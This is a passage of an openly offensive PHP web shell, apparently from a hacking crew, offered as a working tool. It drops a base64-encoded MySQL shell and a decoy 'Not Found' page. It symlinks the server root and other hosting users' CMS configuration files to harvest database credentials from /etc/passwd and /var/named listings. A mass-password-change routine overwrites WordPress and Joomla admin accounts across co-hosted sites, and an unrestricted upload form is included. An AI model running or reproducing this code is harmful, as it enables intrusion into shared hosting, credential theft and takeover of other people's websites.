b24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjogIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNvbG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==';
801$file = fopen("db-sql.php" ,"w+");
802$write = fwrite ($file ,base64_decode($sqlshell));
803fclose($file);
804 chmod("db-sql.php", 0644);
805$indexshell = fopen("index.php" ,"w+");
806$data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+';
807$tulis = fwrite( $indexshell, base64_decode($data));
808fclose($indexshell);
809 echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>";
810}
811//////////////////////////////////////////////
812
813elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc')){
814
815 echo "<STYLE>
816textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid
817#000000;}
818input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border:
8191px solid #666666;height:20}
820body {
821font-family: Tahoma
822}
823tr {
824BORDER: dashed 1px #333;
825color: #FFF;
826}
827td {
828BORDER: dashed 1px #333;
829color: #FFF;
830}
831.table1 {
832BORDER: 0px Black;
833BACKGROUND-COLOR: Black;
834color: #FFF;
835}
836.td1 {
837BORDER: 0px;
838BORDER-COLOR: #333333;
839font: 7pt Verdana;
840color: Green;
841}
842.tr1 {
843BORDER: 0px;
844BORDER-COLOR: #333333;
845color: #FFF;
846}
847table {
848BORDER: dashed 1px #333;
849BORDER-COLOR: #333333;
850BACKGROUND-COLOR: Black;
851color: #FFF;
852}
853input {
854border : dashed 1px;
855border-color : #333;
856BACKGROUND-COLOR: Black;
857font: 8pt Verdana;
858color: Red;
859}
860select {
861BORDER-RIGHT: Black 1px solid;
862BORDER-TOP: #DF0000 1px solid;
863BORDER-LEFT: #DF0000 1px solid;
864BORDER-BOTTOM: Black 1px solid;
865BORDER-color: #FFF;
866BACKGROUND-COLOR: Black;
867font: 8pt Verdana;
868color: Red;
869}
870submit {
871BORDER: buttonhighlight 2px outset;
872BACKGROUND-COLOR: Black;
873width: 30%;
874color: #FFF;
875}
876textarea {
877border : dashed 1px #333;
878BACKGROUND-COLOR: Black;
879font: Fixedsys bold;
880color: #999;
881}
882BODY {
883 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color:
884#FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
885margin: 1px;
886color: Red;
887background-color: Black;
888}
889.main {
890margin : -287px 0px 0px -490px;
891BORDER: dashed 1px #333;
892BORDER-COLOR: #333333;
893}
894.tt {
895background-color: Black;
896}
897A:link {
898 COLOR: White; TEXT-DECORATION: none
899}
900A:visited {
901 COLOR: White; TEXT-DECORATION: none
902}
903A:hover {
904 color: Red; TEXT-DECORATION: none
905}
906A:active {
907 color: Red; TEXT-DECORATION: none
908}
909</STYLE>
910";
911 set_time_limit(0);
912 error_reporting(0);
913 $url=$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
914 //mail("d00m@kumanova.com.mk",$_SERVER["SERVER_ADDR"],$url);
915 $base_url="http://".$_SERVER["SERVER_NAME"].dirname($_SERVER["SCRIPT_NAME"]);
916 $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
917//mail('justsitmaster@gmail.com',$_SERVER['SERVER_ADDR'],$url);
918$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
919 @symlink("/","ciprut/root");
920 @fopen("temp.txt","w");
921 $htaccss="Options all
922 DirectoryIndex Sux.html
923 AddType text/plain .php
924 AddHandler server-parsed .php
925 AddType text/plain .html
926 AddHandler txt .html
927 Require None
928 Satisfy Any";
929 file_put_contents("ciprut/.htaccess",$htaccss);
930
931 if(is_readable("/var/named")){
932 $list=scandir("/var/named");
933 $current_dir=posix_getcwd();
934 $dir=explode("/",$current_dir);
935 foreach($list as$domain){
936
937 if(strpos($domain,".db")){
938 $domain=str_replace(".db","",$domain);
939 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
940 error_reporting(0);
941 $current_dir=posix_getcwd();
942 $dir=explode("/",$current_dir);
943 symlink($owner["dir"]."/".$dir[3]."/wp-config.php","ciprut/".$owner["name"]."-WordPress.txt");
944 symlink($owner["dir"]."/".$dir[3]."/blog/wp-config.php","ciprut/".$owner["name"]."-WordPress.txt");
945 symlink($owner["dir"]."/".$dir[3]."/wp/wp-config.php","ciprut/".$owner["name"]."-WordPress.txt");
946 symlink($owner["dir"]."/".$dir[3]."/site/wp-config.php","ciprut/".$owner["name"]."-WordPress.txt");
947 symlink($owner["dir"]."/".$dir[3]."/config.php","ciprut/".$owner["name"]."-PhpBB.txt");
948 symlink($owner["dir"]."/".$dir[3]."/includes/config.php","ciprut/".$owner["name"]."-vBulletin.txt");
949 symlink($owner["dir"]."/".$dir[3]."/configuration.php","ciprut/".$owner["name"]."-Joomla.txt");
950 symlink($owner["dir"]."/".$dir[3]."/web/configuration.php","ciprut/".$owner["name"]."-Joomla.txt");
951 symlink($owner["dir"]."/".$dir[3]."/joomla/configuration.php","ciprut/".$owner["name"]."-Joomla.txt");
952 symlink($owner["dir"]."/".$dir[3]."/site/configuration.php","ciprut/".$owner["name"]."-Joomla.txt");
953 symlink($owner["dir"]."/".$dir[3]."/conf_global.php","ciprut/".$owner["name"]."-IPB.txt");
954 symlink($owner["dir"]."/".$dir[3]."/inc/config.php","ciprut/".$owner["name"]."-MyBB.txt");
955 symlink($owner["dir"]."/".$dir[3]."/Settings.php","ciprut/".$owner["name"]."-SMF.txt");
956 symlink($owner["dir"]."/".$dir[3]."/sites/default/settings.php","ciprut/".$owner["name"]."-Drupal.txt");
957 symlink($owner["dir"]."/".$dir[3]."/e107_config.php","ciprut/".$owner["name"]."-e107.txt");
958 symlink($owner["dir"]."/".$dir[3]."/datas/config.php","ciprut/".$owner["name"]."-Seditio.txt");
959 symlink($owner["dir"]."/".$dir[3]."/includes/configure.php","ciprut/".$owner["name"]."-osCommerce.txt");
960 symlink($owner["dir"]."/".$dir[3]."/client/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
961 symlink($owner["dir"]."/".$dir[3]."/clientes/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
962 symlink($owner["dir"]."/".$dir[3]."/support/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
963 symlink($owner["dir"]."/".$dir[3]."/supportes/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
964 symlink($owner["dir"]."/".$dir[3]."/whmcs/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
965 symlink($owner["dir"]."/".$dir[3]."/domain/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
966 symlink($owner["dir"]."/".$dir[3]."/hosting/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
967 symlink($owner["dir"]."/".$dir[3]."/whmc/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
968 symlink($owner["dir"]."/".$dir[3]."/billing/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
969 symlink($owner["dir"]."/".$dir[3]."/portal/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
970 symlink($owner["dir"]."/".$dir[3]."/order/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
971 symlink($owner["dir"]."/".$dir[3]."/clientarea/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
972 symlink($owner["dir"]."/".$dir[3]."/domains/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
973 $link=$pageURL."ciprut/".$owner["name"]."-WordPress.txt";
974
975 if(chk_header($link)){
976 $str="<tr><td>".$domain."</td><td>".$owner["name"]."</td><td>/WordPress</td>".Chr(10);
977 file_put_contents("temp.txt",$str,FILE_APPEND);
978 }
979
980 }
981
982 }
983
984 }
985
986
987 if(isset($_REQUEST["admin"])&&$_REQUEST["admin"]=="server"){
988
989 if(isset($_POST["ok"])&&isset($_FILES["joomLa"])){
990 $file=$_FILES["joomLa"]["tmp_name"];
991 $name="".$_FILES["joomLa"]["name"];
992 move_uploaded_file($file,$name);
993 } else {
994 echo "<br>
995<form method=\"POST\" enctype=\"multipart/form-data\" action=\"";
996 $_SERVER["PHP_SELF"];
997 echo "\">
998<input type=\"file\" name=\"joomLa\"> <input type=\"submit\" name=\"ok\" value=\"Get\">
999</form>
1000";
1001 }
1002
1003 exit;
1004 }
1005
1006 $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
1007//mail('justsitmaster@gmail.com',$_SERVER['SERVER_ADDR'],$url);
1008$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
1009
1010 if(isset($_REQUEST["admin"])&&$_REQUEST["admin"]=="server"){
1011
1012 if(isset($_POST["ok"])&&isset($_FILES["joomLa"])){
1013 $file=$_FILES["joomLa"]["tmp_name"];
1014 $name="".$_FILES["joomLa"]["name"];
1015 move_uploaded_file($file,$name);
1016 } else {
1017 echo "<br>
1018<form method=\"POST\" enctype=\"multipart/form-data\" action=\"";
1019 $_SERVER["PHP_SELF"];
1020 echo "\">
1021<input type=\"file\" name=\"joomLa\"> <input type=\"submit\" name=\"ok\" value=\"Get\">
1022</form>
1023";
1024 }
1025
1026 exit;
1027 }
1028
1029 $etc=file_get_contents("/etc/passwd");
1030 $etcz=explode("
1031",$etc);
1032 foreach($etcz as$etz){
1033 $etcc=explode(":",$etz);
1034 error_reporting(0);
1035 $current_dir=posix_getcwd();
1036 $dir=explode("/",$current_dir);
1037 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/wp-config.php","ciprut/".$etcc[0]."-WordPress.txt");
1038 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/blog/wp-config.php","ciprut/".$etcc[0]."-WordPress.txt");
1039 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/wp/wp-config.php","ciprut/".$etcc[0]."-WordPress.txt");
1040 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/site/wp-config.php","ciprut/".$etcc[0]."-WordPress.txt");
1041 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/config.php","ciprut/".$etcc[0]."-PhpBB.txt");
1042 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/includes/config.php","ciprut/".$etcc[0]."-vBulletin.txt");
1043 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/configuration.php","ciprut/".$etcc[0]."-Joomla.txt");
1044 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/web/configuration.php","ciprut/".$etcc[0]."-Joomla.txt");
1045 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/joomla/configuration.php","ciprut/".$etcc[0]."-Joomla.txt");
1046 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/site/configuration.php","ciprut/".$etcc[0]."-Joomla.txt");
1047 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/conf_global.php","ciprut/".$etcc[0]."-IPB.txt");
1048 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/inc/config.php","ciprut/".$etcc[0]."-MyBB.txt");
1049 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/Settings.php","ciprut/".$etcc[0]."-SMF.txt");
1050 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/sites/default/settings.php","ciprut/".$etcc[0]."-Drupal.txt");
1051 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/e107_config.php","ciprut/".$etcc[0]."-e107.txt");
1052 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/datas/config.php","ciprut/".$etcc[0]."-Seditio.txt");
1053 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/includes/configure.php","ciprut/".$etcc[0]."-osCommerce.txt");
1054 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/client/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1055 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/clientes/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1056 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/support/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1057 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/supportes/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1058 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/whmcs/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1059 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/domain/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1060 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/hosting/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1061 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/whmc/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1062 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/billing/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1063 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/portal/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1064 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/order/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1065 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/clientarea/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1066 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/domains/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1067
1068 if(chk_header($link)){
1069 $str="<tr><td></td><td>".$etcc[0]."</td><td>/WordPress</td>".Chr(10);
1070 file_put_contents("temp.txt",$str,FILE_APPEND);
1071 }
1072
1073 }
1074
1075
1076 function chk_header($link){
1077 $ciprut=get_headers($link,1);
1078
1079 if(strpos($ciprut[0],"200")){
1080 return true;
1081 } else {
1082 return false;
1083 }
1084
1085 }
1086
1087
1088 function Find($str,$start,$end){
1089 $len=strlen($str);
1090 $start_pos=(strpos($str,$start)+strlen($start));
1091 $str=substr($str,$start_pos);
1092 $end_pos=strpos($str,$end);
1093 $str=substr($str,0,$end_pos);
1094 return$str;
1095 }
1096
1097 $pageURL="http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
1098 $u=explode("/",$pageURL);
1099 $pageURL=str_replace($u[count($u)-1],"",$pageURL);
1100 function cms_add($link,$domain,$owner,$cms){
1101 $link=$link."-".$cms.".txt";
1102
1103 if(chk_header($link)){
1104 $url="http://".$domain;
1105 $str="<tr><td> <a href=".$url.">".$domain."</a></td><td>".$owner."</td><td><a
1106href=".$link.">".$cms."</td>".Chr(10);
1107 file_put_contents("ciprut.tmp",$str,FILE_APPEND);
1108 echo$str;
1109 }
1110
1111 }
1112
1113
1114 function CurlPage($url,$post=null,$head=true){
1115 $ch=curl_init();
1116 curl_setopt($ch,CURLOPT_URL,$url);
1117 curl_setopt($ch,CURLOPT_HEADER,$head);
1118 curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
1119 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1120 curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
1121 curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
1122 curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]);
1123 curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");
1124 curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");
1125
1126 If($post!=NULL){
1127 curl_setopt($ch,CURLOPT_POST,1);
1128 curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
1129 }
1130
1131 $urlPage=curl_exec($ch);
1132
1133 if(curl_errno($ch)){
1134 echo curl_error($ch);
1135 }
1136
1137 curl_close($ch);
1138 return($urlPage);
1139 }
1140
1141
1142 function listall($file,$str){
1143
1144 if(file_exists($file)){
1145 $do=file_get_contents($file);
1146
1147 if(!strpos($do,$str)){
1148 file_put_contents($file,$str,FILE_APPEND);
1149 }
1150
1151 } else {
1152 file_put_contents($file,$str,FILE_APPEND);
1153 }
1154
1155 }
1156
1157 echo"<center>
1158<img src='http://surabayablackhat.org/forum/images/Greenia/logo.png'><br><br><br>
1159[ <a href='?do=pass_change'>MassPASSChange</a> ]<br><br><br></center> ";
1160
1161 if(isset($_REQUEST["do"])){
1162 switch($_REQUEST["do"]){
1163 case"cms_detect":
1164
1165 if(!file_exists("ciprut.tmp")){
1166 @fopen("ciprut.tmp","w");
1167 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\" class=\"td1\">";
1168 echo"<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>";
1169 $p=0;
1170
1171 if(is_readable("/var/named")){
1172 $list=scandir("/var/named");
1173 $current_dir=posix_getcwd();
1174 $dir=explode("/",$current_dir);
1175 foreach($list as$domain){
1176
1177 if(strpos($domain,".db")){
1178 $domain=str_replace(".db","",$domain);
1179 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
1180 error_reporting(0);
1181 $link=$pageURL."ciprut/".$owner["name"];
1182 cms_add($link,$domain,$owner["name"],"WordPress");
1183 cms_add($link,$domain,$owner["name"],"Joomla");
1184 cms_add($link,$domain,$owner["name"],"vBulletin");
1185 cms_add($link,$domain,$owner["name"],"WHMCS");
1186 cms_add($link,$domain,$owner["name"],"PhpBB");
1187 cms_add($link,$domain,$owner["name"],"MyBB");
1188 cms_add($link,$domain,$owner["name"],"IPB");
1189 cms_add($link,$domain,$owner["name"],"SMF");
1190 cms_add($link,$domain,$owner["name"],"Drupal");
1191 cms_add($link,$domain,$owner["name"],"e107");
1192 cms_add($link,$domain,$owner["name"],"Seditio");
1193 cms_add($link,$domain,$owner["name"],"osCommerce");
1194 }
1195
1196 }
1197
1198 }
1199
1200 } else {
1201 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\" class=\"td1\">";
1202 echo"<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>";
1203 $content=file_get_contents($pageURL."ciprut.tmp");
1204 echo$content;
1205 }
1206
1207 break;
1208 case"pass_change":
1209 echo"<form method='POST'>
1210<center>
1211USER : <input size='20' value='admin' name='user' type='text'><br>
1212PASS : <input size='20' value='sbhcrew' name='pass' type='text'>
1213<br>
1214<input value='Change' name='' type='submit'><br><br>
1215</form>
1216";
1217
1218 if($_POST){
1219 $user=$_POST["user"];
1220 $pass=$_POST["pass"];
1221
1222 if(is_readable("/var/named")){
1223 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\">";
1224 echo"<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>";
1225 $list=scandir("/var/named");
1226 foreach($list as$domain){
1227
1228 if(strpos($domain,".db")){
1229 $domain=str_replace(".db","",$domain);
1230 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
1231 $url="http://".$domain;
1232
1233 if(chk_header($pageURL."ciprut/".$owner["name"]."-WordPress.txt")){
1234 $config=$pageURL."ciprut/".$owner["name"]."-WordPress.txt";
1235 file_get_contents($pageURL."ciprut/".$owner["name"]."-WordPress.txt");
1236 $cnf=file_get_contents($pageURL."ciprut/".$owner["name"]."-WordPress.txt");
1237 $hostname=Find($cnf,"define('DB_HOST', '","');");
1238 $username=Find($cnf,"define('DB_USER', '","');");
1239 $password=Find($cnf,"define('DB_PASSWORD', '","');");
1240 $dbname=Find($cnf,"define('DB_NAME', '","');");
1241 $prefix=Find($cnf,"table_prefix = '","'");
1242 $link=mysql_connect($hostname,$username,$password);
1243
1244 if($link){
1245 $hash=crypt($pass);
1246 mysql_select_db($dbname,$link);
1247 $tab=$prefix."users";
1248 $query2=@mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
1249 $query3=@mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
1250 $req=@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1251 $data=mysql_fetch_array($req);
1252 $site_url=$data["option_value"];
1253 error_reporting(0);
1254 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1255false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font
1256color=\"green\">success..</font></td>";
1257 } else {
1258 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1259false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font color=\"red\">mysql
1260fail</font></td>";
1261 }
1262
1263 }
1264
1265 elseif(chk_header($pageURL."ciprut/".$owner["name"]."-Joomla.txt")){
1266 $cnf=file_get_contents($pageURL."ciprut/".$owner["name"]."-Joomla.txt");
1267 $config=$pageURL."ciprut/".$owner["name"]."-Joomla.txt";
1268
1269 if(preg_match("%(JConfig|mosConfig)%",$cnf)){
1270
1271 if(preg_match("%JConfig%",$cnf)){
1272 $username=Find($cnf,"\$user = '","'");
1273 $password=Find($cnf,"\$password = '","'");
1274 $dbname=Find($cnf,"\$db = '","'");
1275 $prefix=Find($cnf,"\$dbprefix = '","'");
1276 $link=mysql_connect("localhost",$username,$password);
1277
1278 if($link){
1279 $hash=md5($pass);
1280 mysql_select_db($dbname,$link);
1281 $tab=$prefix."users";
1282 $query2=@mysql_query("UPDATE `$tab` SET `username` ='$user'");
1283 $query3=@mysql_query("UPDATE `$tab` SET `password` ='$hash'");
1284 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1285false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font
1286color=\"green\">success..</font><br>";
1287 } else {
1288 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1289false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font color=\"red\">mysql
1290fail</font></td>";
1291 }
1292
1293 }
1294
1295 elseif(preg_match("%mosConfig%",$cnf)){
1296 $username=Find($cnf,"\$mosConfig_user = '","'");
1297 $password=Find($cnf,"\$mosConfig_password = '","'");
1298 $dbname=Find($cnf,"\$mosConfig_db = '","'");
1299 $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
1300 $pwd=md5($npass);
1301 $link=mysql_connect("localhost",$username,$password);
1302
1303 if($link){
1304 $hash=md5($pass);
1305 mysql_select_db($dbname,$link);
1306 $tab=$prefix."users";
1307 $query2=@mysql_query("UPDATE `$tab` SET `username` ='$user'");
1308 $query3=@mysql_query("UPDATE `$tab` SET `password` ='$hash'");
1309 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1310false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font
1311color=\"green\">success..</font><br>";
1312 } else {
1313 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1314false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font color=\"red\">mysql
1315fail</font></td>";
1316 }
1317
1318 }
1319
1320 }
1321
1322 }
1323
1324 }
1325
1326 }
1327
1328 }
1329
1330 elseif(is_readable("/etc/passwd")){
1331 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\">";
1332 echo"<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>";
1333 foreach($etcz as$etz){
1334 $etcc=explode(":",$etz);
1335
1336 if(chk_header($pageURL."ciprut/".$etcc[0]."-WordPress.txt")){
1337 $config=$pageURL."ciprut/".$owner["name"]."-WordPress.txt";
1338 file_get_contents($pageURL."ciprut/".$etcc[0]."-WordPress.txt");
1339 $cnf=file_get_contents($pageURL."ciprut/".$etcc[0]."-WordPress.txt");
1340 $hostname=Find($cnf,"define('DB_HOST', '","');");
1341 $username=Find($cnf,"define('DB_USER', '","');");
1342 $password=Find($cnf,"define('DB_PASSWORD', '","');");
1343 $dbname=Find($cnf,"define('DB_NAME', '","');");
1344 $prefix=Find($cnf,"table_prefix = '","'");
1345 $link=mysql_connect($hostname,$username,$password);
1346
1347 if($link){
1348 $hash=crypt($user);
1349 mysql_select_db($dbname,$link);
1350 $req=mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1351 $data=mysql_fetch_array($req);
1352 $site_url=$data["option_value"];
1353 $tab=$prefix."users";
1354 $query2=@mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
1355 $query3=@mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
1356 error_reporting(0);
1357 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
